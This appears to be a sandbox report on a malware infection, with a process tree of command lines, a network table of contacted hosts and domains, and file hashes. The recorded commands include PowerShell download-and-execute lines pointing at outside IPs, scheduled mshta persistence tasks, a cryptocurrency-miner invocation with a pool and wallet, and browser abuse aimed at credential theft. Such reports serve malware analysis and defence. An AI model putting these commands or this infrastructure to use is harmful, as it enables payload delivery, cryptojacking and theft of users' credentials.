"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5995.tmp\5996.tmp\5997.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5muhcagw\5muhcagw.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB10.tmp" "c:\Users\Admin\AppData\Local\Temp\5muhcagw\CSCE2143F3F87124EFFBE7090E7EC1FD14.TMP"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
"C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"
C:\Users\Admin\AppData\Local\Temp\dll32.exe
"C:\Users\Admin\AppData\Local\Temp\dll32.exe"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Windows\System32\notepad.exe
--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe"
C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe
"C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe"
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1940"
C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe
"C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn hBpNSma7kUh /tr "mshta C:\Users\Admin\AppData\Local\Temp\kAxSdUV2p.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\kAxSdUV2p.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn hBpNSma7kUh /tr "mshta C:\Users\Admin\AppData\Local\Temp\kAxSdUV2p.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE
"C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3D4D.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp3D4D.tmp.bat
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 4264"
C:\Windows\system32\find.exe
find ":"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe
"C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1940"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "R0yhcmahnHj" /tr "mshta \"C:\Temp\WK6TyvNYU.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\WK6TyvNYU.hta"
C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe
"C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe
"C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe"
C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe
"C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1584 -ip 1584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 812
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe
"C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1940"
C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe
"C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\ProgramData\nxpsp\mcsq.exe
C:\ProgramData\nxpsp\mcsq.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe
"C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1940"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --disable-gpu
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffa2898cc40,0x7ffa2898cc4c,0x7ffa2898cc58
C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe
"C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1408,i,14568539947306955284,2076734954859821730,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1400 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1372,i,14568539947306955284,2076734954859821730,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1644 /prefetch:3
C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe
"C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe"
C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe
"C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1968 -parentBuildID 20240401114208 -prefsHandle 1884 -prefMapHandle 1876 -prefsLen 26973 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {89434cc4-5c02-4e46-9952-f5b162d41cf7} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" gpu
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1940"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2404 -parentBuildID 20240401114208 -prefsHandle 2396 -prefMapHandle 2392 -prefsLen 27893 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bcefe755-ed17-4c92-8eba-b3eeafe2e8c9} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2992 -childID 1 -isForBrowser -prefsHandle 2984 -prefMapHandle 2980 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6aee126-02ba-4091-ab76-345d3946e11b} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe
"C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4092 -childID 2 -isForBrowser -prefsHandle 4084 -prefMapHandle 4080 -prefsLen 32383 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf9c54d7-c2d6-4610-affc-978c87b62edd} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4224 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4884 -prefMapHandle 4880 -prefsLen 32383 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cebe1feb-5ef3-4020-a479-6a52580b6948} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5312 -childID 3 -isForBrowser -prefsHandle 5296 -prefMapHandle 5304 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5accf423-98c0-444c-800e-ed14ca4b0c51} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5468 -childID 4 -isForBrowser -prefsHandle 5424 -prefMapHandle 5324 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dc5080e6-9ef4-4303-b2b8-56c721da26ab} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5660 -childID 5 -isForBrowser -prefsHandle 5616 -prefMapHandle 5428 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54817f4f-d0e9-4663-8819-257164c54489} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe"
C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\10107560101\ktxzLhN.exe
"C:\Users\Admin\AppData\Local\Temp\10107560101\ktxzLhN.exe"
C:\Users\Admin\AppData\Local\Temp\dll32.exe
"C:\Users\Admin\AppData\Local\Temp\dll32.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1940"
C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| DE | 192.248.189.11:443 | pool.hashvault.pro | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| NL | 45.154.98.175:6969 | N/A | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| US | 104.21.96.1:443 | exarthynature.run | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | croprojegies.run | udp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| US | 104.21.16.1:443 | croprojegies.run | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 45.93.20.28:80 | 45.93.20.28 | tcp |
| N/A | 127.0.0.1:9222 | N/A | tcp |
| N/A | 127.0.0.1:9222 | N/A | tcp |
| N/A | 127.0.0.1:50649 | N/A | tcp |
| N/A | 127.0.0.1:50658 | N/A | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| GB | 142.250.187.206:443 | youtube.com | tcp |
| GB | 142.250.187.206:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | tcp |
| GB | 142.250.187.206:443 | youtube.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| GB | 172.217.16.238:443 | youtube-ui.l.google.com | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| GB | 172.217.16.238:443 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.107.152.202:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | tracking-protection.cdn.mozilla.net | udp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| NL | 2.18.121.79:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.16.238:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r2---sn-aigl6ns6.gvt1.com | udp |
| GB | 74.125.105.7:443 | r2---sn-aigl6ns6.gvt1.com | tcp |
| US | 8.8.8.8:53 | r2.sn-aigl6ns6.gvt1.com | udp |
| US | 8.8.8.8:53 | r2.sn-aigl6ns6.gvt1.com | udp |
| GB | 74.125.105.7:443 | r2.sn-aigl6ns6.gvt1.com | udp |
Files
memory/1664-0-0x0000000000B80000-0x0000000000E8F000-memory.dmp
memory/1664-1-0x0000000077774000-0x0000000077776000-memory.dmp
memory/1664-2-0x0000000000B81000-0x0000000000BE1000-memory.dmp
memory/1664-3-0x0000000000B80000-0x0000000000E8F000-memory.dmp
memory/1664-4-0x0000000000B80000-0x0000000000E8F000-memory.dmp
memory/1664-5-0x0000000000B80000-0x0000000000E8F000-memory.dmp
memory/1664-6-0x0000000000B80000-0x0000000000E8F000-memory.dmp
memory/1664-7-0x0000000000B80000-0x0000000000E8F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe
| MD5 | f42f59d1a7bc1d3fcd51d41a76974175 |
| SHA1 | 08591f2269d3d8c8099beaa0f4676ae8b0f7bb1c |
| SHA256 | ad14a834ed7d0994d38ec0374f26f4837e94fe5b54d15442c5b2fb796365dc38 |
| SHA512 | 38c5cc4567b19c637b58874dd408d5994c168f071962d7008889b9e360667301107a9efd7e1ee326e53bddbec5f536d562d91c7170761127f568d3175544eaae |
memory/1664-15-0x0000000000B80000-0x0000000000E8F000-memory.dmp
memory/1660-13-0x0000000000090000-0x000000000054D000-memory.dmp
memory/1664-11-0x0000000000B81000-0x0000000000BE1000-memory.dmp
memory/1660-16-0x0000000000091000-0x00000000000BF000-memory.dmp
memory/1660-17-0x0000000000090000-0x000000000054D000-memory.dmp
memory/1660-18-0x0000000000090000-0x000000000054D000-memory.dmp
memory/1660-32-0x0000000000090000-0x000000000054D000-memory.dmp
